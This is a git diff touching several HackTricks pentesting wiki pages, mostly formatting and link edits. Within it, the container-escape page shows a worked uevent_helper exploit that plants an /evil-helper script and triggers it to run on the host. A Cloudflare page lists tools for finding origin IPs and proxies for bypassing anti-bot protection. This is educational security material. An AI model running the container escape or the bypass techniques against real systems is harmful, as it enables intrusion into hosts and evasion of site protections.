||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% embed url="https://websec.nl/" %}
|
{% embed url="https://websec.nl/" %}
|
||||||
|
|
||||||
|
@ -138,23 +138,23 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
|
||||||
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
|
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
|
||||||
* **Example for Exploitation**: %%%bash
|
* **Example for Exploitation**: %%%bash
|
||||||
|
|
||||||
## Creates a payload
|
### Creates a payload
|
||||||
|
|
||||||
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
|
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
|
||||||
|
|
||||||
## Finds host path from OverlayFS mount for container
|
### Finds host path from OverlayFS mount for container
|
||||||
|
|
||||||
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
||||||
|
|
||||||
## Sets uevent\_helper to malicious helper
|
### Sets uevent\_helper to malicious helper
|
||||||
|
|
||||||
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
|
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
|
||||||
|
|
||||||
## Triggers a uevent
|
### Triggers a uevent
|
||||||
|
|
||||||
echo change > /sys/class/mem/null/uevent
|
echo change > /sys/class/mem/null/uevent
|
||||||
|
|
||||||
## Reads the output
|
### Reads the output
|
||||||
|
|
||||||
cat /output %%%
|
cat /output %%%
|
||||||
|
|
||||||
|
@ -187,7 +187,7 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
|
||||||
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
||||||
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% embed url="https://websec.nl/" %}
|
{% embed url="https://websec.nl/" %}
|
||||||
|
|
||||||
|
|
|
@ -285,6 +285,7 @@ Tools:
|
||||||
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
|
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
|
||||||
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
|
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
|
||||||
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
|
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
|
||||||
|
* [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
|
||||||
* _/usr/share/wordlists/dirb/common.txt_
|
* _/usr/share/wordlists/dirb/common.txt_
|
||||||
* _/usr/share/wordlists/dirb/big.txt_
|
* _/usr/share/wordlists/dirb/big.txt_
|
||||||
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
|
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
|
||||||
|
|
|
@ -9,12 +9,11 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
## Common Techniques to Uncover Cloudflare
|
## Common Techniques to Uncover Cloudflare
|
||||||
|
|
||||||
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
|
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
|
||||||
|
@ -30,6 +29,7 @@ Other ways to support HackTricks:
|
||||||
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
|
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
|
||||||
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
|
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
|
||||||
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
|
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
|
||||||
|
* [**CloakQuest3r**](https://github.com/spyboy-productions/CloakQuest3r): CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield.
|
||||||
* [Censys](https://search.censys.io/)
|
* [Censys](https://search.censys.io/)
|
||||||
* [Shodan](https://shodan.io/)
|
* [Shodan](https://shodan.io/)
|
||||||
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
|
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
|
||||||
|
@ -125,10 +125,11 @@ Use a headless browser that isn't deetcted as an automated browser (you might ne
|
||||||
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
|
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
|
||||||
|
|
||||||
Som of them are:
|
Som of them are:
|
||||||
* [ScraperAPI](https://www.scraperapi.com/?fp_ref=scrapeops)
|
|
||||||
|
* [ScraperAPI](https://www.scraperapi.com/?fp\_ref=scrapeops)
|
||||||
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
|
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
|
||||||
* [Oxylabs](https://oxylabs.go2cloud.org/aff_c?offer_id=7&aff_id=379&url_id=32)
|
* [Oxylabs](https://oxylabs.go2cloud.org/aff\_c?offer\_id=7\&aff\_id=379\&url\_id=32)
|
||||||
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/[p_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
|
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/\[p\_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
|
||||||
|
|
||||||
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
|
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
|
||||||
|
|
||||||
|
@ -142,8 +143,6 @@ Reverse engineering Cloudflare's anti-bot measures is a tactic used by smart pro
|
||||||
|
|
||||||
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
|
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
|
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
|
||||||
|
@ -157,7 +156,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Hardware Hacking
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -9,15 +9,12 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## JTAG
|
||||||
#
|
|
||||||
|
|
||||||
# JTAG
|
|
||||||
|
|
||||||
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
||||||
|
|
||||||
|
@ -34,7 +31,7 @@ It can also support other commands such as:
|
||||||
|
|
||||||
You might come across these instructions when you use a tool like the JTAGulator.
|
You might come across these instructions when you use a tool like the JTAGulator.
|
||||||
|
|
||||||
## The Test Access Port
|
### The Test Access Port
|
||||||
|
|
||||||
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
||||||
|
|
||||||
|
@ -46,7 +43,7 @@ Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a gene
|
||||||
|
|
||||||
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
||||||
|
|
||||||
## Identifying JTAG pins
|
### Identifying JTAG pins
|
||||||
|
|
||||||
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
||||||
|
|
||||||
|
@ -58,13 +55,12 @@ Using **JTAGenum**, you’d first **define the pins of the probing** device that
|
||||||
|
|
||||||
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
||||||
|
|
||||||
# SDW
|
## SDW
|
||||||
|
|
||||||
SWD is an ARM-specific protocol designed for debugging.
|
SWD is an ARM-specific protocol designed for debugging.
|
||||||
|
|
||||||
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
@ -74,9 +70,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -105,17 +105,21 @@ You won't find HackTricks filled with annoying ads like other blogs with much le
|
||||||
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
|
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
In any case know that HackTricks in this case would be improving your **SEO** and **encouraging** people to **check your page** (people has mentioned us that since some page of them is in HackTricks they receive more visits). If you still want the content of your blog to be removed from HackTricks let us know.
|
Note that having links to your page in HackTricks:
|
||||||
|
|
||||||
Note that asking this we will definitely **remove every link to your blog**, and any content based on it.
|
* Improve your **SEO**
|
||||||
|
* The content gets **translated to more than 15 languages** making possible for more people to access this content
|
||||||
|
* **HackTricks encourages** people to **check your page** (several people has mentioned us that since some page of them is in HackTricks they receive more visits)
|
||||||
|
|
||||||
|
However, If you still want the content of your blog to be removed from HackTricks just let us know and we will definitely **remove every link to your blog**, and any content based on it.
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
* **What should I do if I find copy-pasted content in HackTricks?**
|
* **What should I do if I find copy-pasted content in HackTricks?**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
**Unfortunatelly this practice might have happened in the beginning of the project when this page was just the notes of a pentester**. We always try to **give the original authors all the credits**. If you find a page with copy-pasted content (even with the original source referenced), let us know and we will either **remove it**, **leave the link**, or **rewrite it**.
|
We always **give the original authors all the credits**. If you find a page with copy-pasted content without original source referenced, let us know and we will either **remove it**, **add the link before the text**, or **rewrite it adding the link**.
|
||||||
|
|
||||||
## LICENSE 
|
## LICENSE
|
||||||
|
|
||||||
Copyright © All rights reserved unless otherwise specified.
|
Copyright © All rights reserved unless otherwise specified.
|
||||||
|
|
||||||
|
@ -161,7 +165,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|